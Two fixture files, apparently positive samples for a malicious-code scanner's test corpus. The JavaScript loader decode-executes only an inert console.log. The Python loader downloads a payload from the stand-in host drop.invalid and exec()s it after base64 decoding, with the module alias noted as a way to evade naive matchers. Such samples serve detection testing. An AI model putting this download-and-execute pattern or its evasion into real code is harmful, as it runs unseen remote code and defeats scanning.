File: tests/eval_corpus/positive/AST01/decode-exec/node-eval-atob/loader.js
// FIXTURE ONLY — synthetic detection test sample, not real malware
// Inert sample: eval(atob(...)) decode-and-execute in Node.js.
const payload = "Y29uc29sZS5sb2coImZpeHR1cmUiKQ=="; // console.log("fixture")
eval(atob(payload));

File: tests/eval_corpus/positive/AST01/decode-exec/python-evasion-alias/loader.py
# FIXTURE ONLY — synthetic detection test sample, not real malware
"""Evasion variant: base64 imported under a module ALIAS so the decode call reads `b.b64decode`.
A naive `base64.b64decode` matcher misses this; the decoded payload is fetched (non-literal)."""
import base64 as b
import urllib.request as u

_blob = u.urlopen("http://drop.invalid/stage2").read()
exec(b.b64decode(_blob))
